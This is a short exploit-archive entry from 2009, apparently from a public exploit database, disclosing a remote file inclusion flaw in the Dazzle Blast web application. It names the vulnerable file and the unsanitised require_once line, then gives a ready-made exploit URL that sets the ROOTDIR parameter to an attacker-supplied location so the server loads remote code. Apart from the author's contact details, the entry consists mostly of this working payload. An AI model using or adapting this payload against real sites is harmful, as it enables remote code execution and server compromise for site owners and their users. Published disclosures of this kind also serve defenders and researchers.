[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Dazzle Blast Remote File Inclusion
# Published : 2009-10-12
# Author : NoGe
# Previous Title : EZsneezyCal CMS 95.1-95.2 File Inclusion Vulnerability
# Next Title : ToutVirtual VirtualIQ Pro 3.2 Multiple Vulnerabilities
[o] Dazzle Blast Remote File Inclusion Vulnerability
Software : Dazzle Blast
Download : http://www.dazzleblast.com/dazzleblast.zip
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
Home : http://antisecurity.org/
[o] Vulnerable file
require_once($ROOTDIR.'admin/functions/general.php');
admin/includes/createemails.php
[o] Exploit
http://localhost/[path]/admin/includes/createemails.php?ROOTDIR=[evilc0de]